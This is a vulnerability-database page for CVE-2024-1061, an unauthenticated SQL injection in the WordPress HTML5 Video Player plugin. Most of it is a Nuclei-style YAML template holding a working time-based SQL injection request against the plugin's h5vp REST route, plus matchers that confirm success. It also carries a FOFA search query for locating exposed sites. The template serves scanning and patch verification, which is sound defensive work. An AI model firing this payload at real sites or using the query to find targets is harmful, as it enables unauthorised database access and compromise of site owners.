CVE-2024-1061: WordPress HTML5 Video Player - SQL Injection

2025-08-01 WordPress HTML5 Video Player PoC Public

Description

WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.

PoC

id: CVE-2024-1061

info:
  name: WordPress HTML5 Video Player - SQL Injection
  author: xxcdd
  severity: critical
  description: |
    WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
  reference:
    - https://www.tenable.com/security/research/tra-2024-02
    - https://wordpress.org/plugins/html5-video-player
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
    - https://github.com/tanjiti/sec_profile
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-1061
    cwe-id: CWE-89
    epss-score: 0.11215
    epss-percentile: 0.95731
    cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bplugins
    product: html5_video_player
    framework: wordpress
    fofa-query: "\"wordpress\" && body=\"html5-video-player\""
  tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "created_at", "video_id")'
        condition: and
# digest: 490a0046304402206e2f9f57fc3696a208b76a02820e716fd07ecd80e509b4a124f1860d2c12f661022069ba20fce1676668935aacb63b0f6a53121bbd3991604859be23085740f79f6d:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities